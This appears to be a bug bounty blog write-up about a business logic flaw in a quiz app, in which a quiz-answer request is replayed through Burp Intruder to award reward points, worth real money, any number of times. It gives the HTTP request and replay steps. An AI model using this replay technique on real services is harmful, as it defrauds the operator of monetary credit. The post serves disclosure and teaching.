Categories
Uncategorized

INCREASING REWARD POINTS N NUMBER OF TIME

BUG: BUSINESS LOGIC

Case Study

As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com

The application is built to play Quiz and win reward points that can be used as money to play Quiz

example: 10 reward points = 1 Rs

to play a quiz you need to pay rs 5 or you can pay 50 reward points and so on. And while registering you get 50 reward points for 1st-time signup. Also, there are free quiz 1 per day where you can earn points.

example: 5 correct ans = 5 points, 10 correct ans = 10 points

minimum correct answer to get reward points is 5.

POC

let’s select a free quiz to earn some points so I managed to get 5 correct answers and awarded 5 points.

HTTP request that takes you answer

POST /endpoint HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
Cookie: _

Upgrade-Insecure-Requests: 1

csrf_test_name=SOME_ID&contestId=MY_ID&stage=SOME_RANDOM_ID&timeTaken=[ARRAY,TO,COLLEECT,TIME ]&questionChoosen=[ ARRAY, OF , ANSWER, EXAMPLE, 1,2,2,3,4 ]&questionTime=["Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz"]&ans=on

intercept the request and send this to intruder

now increase the threads to 25 and select NULL payload in intruder and the number of times you want the reward points to increase.

done.

There is no check whether the quiz is already played or not. They are just checking the number of right answers and awarding points.

queries ping

Twitter : https://twitter.com/wisdomfreak1

LinkedIn: https://www.linkedin.com/in/saddam-hussain-01766a148/

Leave a Reply

Your email address will not be published. Required fields are marked *